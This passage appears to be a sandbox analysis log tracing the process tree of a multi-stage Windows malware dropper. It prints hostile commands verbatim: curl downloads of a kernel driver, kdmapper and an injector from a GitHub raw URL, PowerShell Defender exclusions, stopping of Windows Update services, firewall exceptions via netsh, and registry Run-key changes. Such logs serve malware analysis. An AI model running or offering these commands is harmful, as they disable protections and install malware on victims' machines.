C:\Windows\system32\curl.execurl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent7⤵PID:3936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&16⤵PID:6084
-
C:\Windows\system32\curl.execurl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent7⤵PID:5948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&16⤵PID:5720
-
C:\Windows\system32\curl.execurl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent7⤵PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:5916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1400
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2644
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5268 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:5880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
PID:5692 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6080
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6108
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3540
-
-
-
C:\Users\Admin\AppData\Local\Temp\251081684.exeC:\Users\Admin\AppData\Local\Temp\251081684.exe5⤵PID:4484
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:6932
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:7624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:6424
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:9300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\192162186.exeC:\Users\Admin\AppData\Local\Temp\192162186.exe5⤵PID:8704
-
-
C:\Users\Admin\AppData\Local\Temp\1541530299.exeC:\Users\Admin\AppData\Local\Temp\1541530299.exe5⤵PID:9312
-
-
C:\Users\Admin\AppData\Local\Temp\1397623963.exeC:\Users\Admin\AppData\Local\Temp\1397623963.exe5⤵PID:10312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5928 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4116
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\Files\Microsoft.exe"3⤵PID:3568
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:4392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:2484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:1000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:5716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:5492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:3420
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6192
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:4612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:3392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:3156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15884
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:18852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:22428
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:23832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:22168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:17028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:21596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:18944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:21924
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:5840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:20352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:22352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:6408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:17532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8580
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:23620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:24488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:1708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:10004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:7056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:21044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:22872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9632
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:21840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:4348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:14032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9436
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:15876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:9316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:8296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:18440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:19536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:23492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:22584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:23824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:13740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:19232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:25976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:25188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:24036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:25920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:27160
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:1084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:12828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:16464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:11868
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\svhost.exe4⤵PID:19852
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\testingg.exe"C:\Users\Admin\AppData\Local\Temp\Files\testingg.exe"3⤵PID:5936
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵PID:4804
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4812
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"5⤵
- Modifies Windows Firewall
PID:5596
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:72
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 12125⤵PID:19060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\up.exe"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"3⤵PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe"C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe"3⤵PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"3⤵PID:792
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 3124⤵
- Program crash
PID:3864
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\vpn.exe"C:\Users\Admin\AppData\Local\Temp\Files\vpn.exe"3⤵PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"C:\Users\Admin\AppData\Local\Temp\Files\SingerJudy.exe"3⤵PID:14380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Attacked Attacked.bat & Attacked.bat4⤵PID:16340
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:15432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:6784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\update.exe"C:\Users\Admin\AppData\Local\Temp\Files\update.exe"3⤵PID:15188
-
-
C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"3⤵PID:17868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"3⤵PID:18224
-
-
C:\Users\Admin\AppData\Local\Temp\Files\exe008.exe"C:\Users\Admin\AppData\Local\Temp\Files\exe008.exe"3⤵PID:17920
-
C:\Windows\SysWOW64\Hckjmd32.exeC:\Windows\system32\Hckjmd32.exe4⤵PID:18068
-
C:\Windows\SysWOW64\Ilkhmecd.exeC:\Windows\system32\Ilkhmecd.exe5⤵PID:18388
-
C:\Windows\SysWOW64\Ifbipn32.exeC:\Windows\system32\Ifbipn32.exe6⤵PID:17832
-
C:\Windows\SysWOW64\Jihkmhjc.exeC:\Windows\system32\Jihkmhjc.exe7⤵PID:17696
-
C:\Windows\SysWOW64\Jcploa32.exeC:\Windows\system32\Jcploa32.exe8⤵PID:18060
-
C:\Windows\SysWOW64\Kecemi32.exeC:\Windows\system32\Kecemi32.exe9⤵PID:17620
-
